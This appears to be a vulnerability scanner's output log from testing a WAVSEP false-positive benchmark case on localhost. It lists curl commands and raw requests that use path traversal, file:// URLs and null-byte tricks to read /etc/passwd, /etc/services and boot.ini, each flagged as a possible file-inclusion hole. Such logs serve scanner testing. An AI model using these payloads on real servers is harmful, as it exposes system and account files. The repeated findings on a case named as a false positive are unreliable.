curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
